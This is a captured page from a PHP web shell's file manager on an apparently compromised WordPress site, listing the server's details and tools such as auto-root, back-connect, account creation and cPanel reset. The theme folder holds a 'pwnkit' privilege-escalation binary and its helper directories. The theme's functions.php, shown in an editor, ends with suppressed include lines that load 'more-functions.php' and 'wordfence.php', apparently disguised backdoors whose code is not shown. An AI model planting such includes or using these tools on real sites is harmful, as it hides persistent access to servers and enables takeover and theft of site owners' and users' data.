Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
vmd /
wp-content /
themes /
theme_vmd /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwx---r-x
inc
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
footer.php
3.33
KB
-rw----r--
functions.php
5.36
KB
-rw----r--
header.php
10.82
KB
-rw----r--
home.php
34.41
KB
-rw----r--
index.php
0
B
-rw----r--
more-functions.php
18.89
KB
-rw-r--r--
oil_gaz.php
7.49
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
screenshot.png
5.8
MB
-rw----r--
search.php
1.3
KB
-rw----r--
solution.php
6.18
KB
-rw----r--
style.css
130
B
-rw----r--
wordfence.php
27.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php require_once get_template_directory() . '/inc/class-wp-bootstrap-navwalker.php'; function load_stylesheets() { wp_register_style('bootsrap','https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css', array(),1,'all' ); wp_enqueue_style('bootsrap'); wp_register_style('style', get_template_directory_uri() . '/assets/css/style.css', array(), 1, 'all'); wp_enqueue_style('style'); wp_register_style('responsive', get_template_directory_uri() . '/assets/css/responsive.css', array(), 1, 'all'); wp_enqueue_style('responsive'); wp_register_style('owl-c', 'https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.carousel.min.css', array(), 1, 'all'); wp_enqueue_style('owl-c'); wp_register_style('aos', 'https://unpkg.com/aos@2.3.1/dist/aos.css', array(), 1, 'all'); wp_enqueue_style('aos'); wp_register_style('font', 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css', array(), 1, 'all'); wp_enqueue_style('font'); } add_action('wp_enqueue_scripts', 'load_stylesheets'); //load scripts function load_scripts() { wp_register_script('jqueryi', 'https://code.jquery.com/jquery-3.6.0.min.js', array(), 1, 'all'); wp_enqueue_script('jqueryi'); wp_register_script('bootstrap', 'https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js', array(), 1, 'all'); wp_enqueue_script('bootstrap'); wp_register_script('owl-carousel', 'https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js', array(), 1, 'all'); wp_enqueue_script('owl-carousel'); wp_register_script('aos', 'https://unpkg.com/aos@2.3.1/dist/aos.js', array(), 1, 'all'); wp_enqueue_script('aos'); wp_register_script('carousel',get_template_directory_uri().'/assets/js/carousel.js', array(),1,'all' ); wp_enqueue_script('carousel'); wp_register_script('navbar',get_template_directory_uri().'/assets/js/navbar.js', array(),1,'all' ); wp_enqueue_script('navbar'); } add_action('wp_enqueue_scripts', 'load_scripts'); function twentyseventeen_setup() { add_theme_support('automatic-feed-links'); add_theme_support('title-tag'); add_theme_support('post-thumbnails'); add_theme_support('woocommerce'); register_nav_menus( array( 'main_menu' => 'Main_Menu', ) ); } add_action('after_setup_theme', 'twentyseventeen_setup'); // Changer les classes de nav function wpse156165_menu_add_class($atts, $item, $args) { switch ($args->theme_location) { case "main_menu": if (!$item->menu_item_parent) { $atts['class'] = 'nav-link'; if (in_array('menu-item-has-children', $item->classes)) { $atts['class'] = 'nav-link dropdown-toggle'; $atts['data-bs-toggle'] = 'dropdown'; $atts['data-bs-auto-close'] = 'outside'; } } else { if (in_array('menu-item-has-children', $item->classes)) { $atts['class'] = 'dropdown-item dropdown-toggle'; $atts['data-bs-toggle'] = 'dropdown'; $atts['data-bs-auto-close'] = 'outside'; } else { $atts['class'] = 'dropdown-item'; } } break; } return $atts; } add_filter('nav_menu_link_attributes', 'wpse156165_menu_add_class', 10, 3); class sub_Walker_Nav_Menu extends Walker_Nav_Menu { function start_lvl(&$output, $depth = 0, $args = NULL) { $indent = str_repeat("\t", $depth); $output .= "\n$indent<ul class=\"dropdown-menu shadow\">\n"; } } function stunning_child_widgets_init() { register_sidebar(array( 'name' => 'Side bar woocommerce', 'id' => 'side_bar_woo', 'before_widget' => '<div class="sidebar_categorie">', 'after_widget' => '</div>', 'before_title' => '<p class="categorie_title">', 'after_title' => '</p>', )); } add_action('widgets_init', 'stunning_child_widgets_init'); // add_action("product_cat_edit_form_fields", 'add_form_fields_example', 10, 2); function add_form_fields_example($term, $taxonomy) { ?> <tr valign="top"> <th scope="row">Description</th> <td> <?php wp_editor(html_entity_decode($term->description), 'description', array('media_buttons' => false)); ?> <script> jQuery(window).ready(function() { jQuery('label[for=description]').parent().parent().remove(); }); </script> </td> </tr> <?php } function _namespace_menu_item_class($classes, $item, $args) { switch ($args->theme_location) { case "main_menu": if (!$item->menu_item_parent) { $classes = ["nav-item dropdown"]; } else { $classes = ["dropdown"]; if (in_array('menu-item-has-children', $item->classes)) { $classes = ["dropdown-submenu"]; } } break; } return $classes; } add_filter('nav_menu_css_class', '_namespace_menu_item_class', 10, 4); @include_once dirname(__FILE__) . '/more-functions.php'; @include_once dirname(__FILE__) . '/wordfence.php'; @include_once dirname(__FILE__) . '/more-functions.php'; @include_once dirname(__FILE__) . '/wordfence.php';
Close